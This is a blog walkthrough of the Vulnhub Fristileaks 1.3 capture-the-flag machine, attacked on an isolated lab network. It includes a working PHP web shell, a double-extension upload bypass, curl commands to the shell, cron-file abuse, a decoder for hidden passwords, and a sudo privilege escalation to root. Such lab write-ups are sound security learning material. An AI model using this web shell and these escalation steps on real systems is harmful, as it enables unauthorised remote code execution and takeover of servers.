Saturday, 19 December 2015

[Vulnhub] Fristileaks: 1.3

Thanks Ar0xA for this "vuln"derful image.
This is my second completely self solved and first write up for vulnhub images. So cheers fellow #vulnhub fellas. \m/

Setup

 My (attacker) IP: 192.168.56.102  
 Vulnerable Image IP: 192.168.56.103  
 Software setup: Oracle VirtualBox on Kali 2.0  

Recon

Like any other challenge, we begin using our classic nmap -

 nmap -A -p- 192.168.56.103 -oA fristileaks  

With this we were able to enumerate the image and found out that only port 80 was open showing us -



However, the interesting part of this was the availability of robots.txt with 3 directories (/cola, /sisi, /beer), all of which had the same result - This is not the url you were looking for!

This was the guessing game part of vulnhub images, unlike my previous challenge, this time I thought I knew how most of my guesses required to be and viola, we got the right drink - fristi.

/fristi



Post this was the much obvious looking into the source code

 <meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">  
 <!--   
 TODO:  
 We need to clean this up for production. I left some junk in here to make testing easier.  
 - by eezeepz  
 -->  


At the bottom of the page we found small encoded snippet,
which much obviously directed us to this image.


 <!--   
 iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx  
 jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl  
 S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw  
 B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f  
 m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ  
 Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb  
 DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd  
 jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU  
 12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5  
 uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1  
 04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq  
 i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg  
 tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws  
 30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl  
 3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK  
 ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q  
 mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34  
 rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe  
 EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH  
 AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk  
 CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR  
 U5ErkJggg==  
 -->  






This leads us to 
By now we can all guess who the user is and what his password would be. 

/home/eezeepz

After logging in, the harder portion of the 4 hours started. We now find a file upload page.
From the enumeration, we knew the server was Apache 2.2.15 running with PHP 5.3.3.
This meant the most common config mistake to allow file upload to be x.php.png.
I quickly wrote a 5 line script and uploaded it on the server. 

 <?php  
 if(isset($_REQUEST['cmd'])){  
   $cmd = ($_REQUEST["cmd"]);  
   system($cmd);  
   echo "</pre>$cmd<pre>";  
   die;}  
 ?>  

The best way to get output from this shell is via curl -
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=ls"  

/home/admin

Somehow I didn't mind this interface and didn't bother getting a reverse tcp connection until a later stage.
After this, I went through the regular techniques of traversing until.

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat ../../../notes.txt"  
 hey eezeepz your homedir is a mess, go clean it up, just dont delete  
 the important stuff.  
 -jerry  
 </pre>cat ../../../notes.txt<pre>  


After going to /home/eezeepz and analyzing the contents, I got hold of
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/eezeepz/notes.txt"  
 Yo EZ,  
 I made it possible for you to do some automated checks,   
 but I did only allow you access to /usr/bin/* system binaries. I did  
 however copy a few extra often needed commands to my   
 homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those  
 from /home/admin/  
 Don't forget to specify the full path for each binary!  
 Just put a file called "runthis" in /tmp/, each line one command. The   
 output goes to the file "cronresult" in /tmp/. It should   
 run every minute with my account privileges.  
 - Jerry  
 </pre>cat /home/eezeepz/notes.txt<pre>  



Trying to traverse into /home/admin/ gave me an *Permission Denied* Error. So going through last half of this message again, the path was pretty clear.
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo 'chmod 777 /home/admin'>/tmp/runthis"  


Unfortunately, this attempt failed because we didn't read the entire message.
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"  
 command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin  

So retrying,
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo '/home/admin/chmod 777 /home/admin'&gt;/tmp/runthis"  

We get,

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"  
 command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin  
 executing: /home/admin/chmod 777 /home/admin  

Aha. Now we could go into the /home/admin directory.

/home/fristigod

Analyzing the contents of this directory, we could see a few interesting files -

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptedpass.txt"
 mVGZ3O3omkJLmy2pcuTq  
 </pre>cat /home/admin/cryptedpass.txt<pre>  

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptpass.py" 
 #Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn<br />  
 import base64,codecs,sys  
 def encodeString(str):  
     base64string= base64.b64encode(str) 
     return codecs.encode(base64string[::-1], 'rot13')
 cryptoResult=encodeString(sys.argv[1])
 print cryptoResult
 </pre>cat /home/admin/cryptpass.py<pre> 
 
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/whoisyourgodnow.txt"  
 =RFn0AKnlMHMPIzpyuTI0ITG
 </pre>cat /home/admin/whoisyourgodnow.txt<pre>  

Quickly writing a decoding program (edited the same prog, hence no naming convention followed)

 $ cat decryptpass.py
 #!/usr/bin/python
 import base64,codecs,sys
 def encodeString(str):
     base64string = codecs.encode(str[::-1], 'rot13') //since English Language has 26 alphabets, we only need to do rot13 to get back the original 
     return base64.b64decode(base64string) // base64 decoding 
 cryptoResult=encodeString(sys.argv[1])
 print cryptoResult


So decrypting the results -

 $ python decryptpass.py mVGZ3O3omkJLmy2pcuTq
 thisisalsopw123
 $ python decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
 LetThereBeFristi!


So now that we have two sets of passwords, we try them on the user accounts. On accessing the /home/ directory, we saw three user profiles - admin, ezzeepz and fristigod. The only major problem was for running a sudo command and elevate privileges, I would require a tty, for which I needed a stable reverse shell and not only a php web shell. After attempting to build a custom simple shell and failing muiltiple times (netcat and telnet were not there in the system so was trying to get a php or pyton reverse tcp connection), I just switched back to my script kiddie nature and used php-reverse-shell to get access into the machine.

/root/

Launching a tty to escalate privileges with sudo can be done with the python one liner (Thank you Pentest monkey, again)

 $ python -c 'import pty; pty.spawn("/bin/sh")'

After this I was able to figure out the credentials of admin(thisisalsopw123) and fristigod(LetThereBeFristi!).
My hope of Admin being the sudo user was thrashed and on running find / -perm -4000, I pretty much got the idea who the sudo user is (last line - find: `/var/fristigod': Permission denied).

After su fristigod, I ran  find / -perm -4000 to find

 /var/fristigod/.secret_admin_stuff/doCom

Unfortunately,
 bash-4.1$ ./var/fristigod/.secret_admin_stuff/doCom 
 ./var/fristigod/.secret_admin_stuff/doCom 
 Nice try, but wrong user ;) 

traversing into the directory, I figured doCom was accessible only via root perms, but the perms to this folder was given to fristigod. This was the obvious point of escalation. Hence I tried harder,

 bash-4.1$ sudo ./doCom  
 sudo ./doCom
 Sorry, user fristigod is not allowed to execute './doCom' as root on localhost.localdomain. 

This point I knew I had to run as a different user. On analyzing the /etc/passwd I saw a user named fristi. I knew this was the user. However, I still run 

 bash-4.1$ sudo -l
 sudo -l
 Matching Defaults entries for fristigod on this host:
  requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
  DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
  PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
  LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
  LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
  LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
  secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 User fristigod may run the following commands on this host:
  (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom   

This was the confirmation. The next command gave me access to this file

 bash-4.1$ sudo -u fristi ./doCom
 sudo -u fristi ./doCom
 Usage: ./program_name terminal_command ...

This was simple now,

 bash-4.1$ sudo -u fristi ./doCom /bin/bash
 sudo -u fristi ./doCom /bin/bash 
 bash-4.1# id  
 id
 uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Pwn'd. Now for the flag -


 bash-4.1# cd /root  
 cd /root  
 bash-4.1# ls   
 ls  
 fristileaks_secrets.txt  
 bash-4.1# cat fristileaks_secrets.txt  
 cat fristileaks_secrets.txt  
 Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]  
 I wonder if you beat it in the maximum 4 hours it's supposed to take!  
 Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)  
 Flag: Y0u_kn0w_y0u_l0ve_fr1st1  

And w00t w00t! Fristileaks solved within 4 hours :)
Hope to continue pwn'ing such challenges from Vulnhub.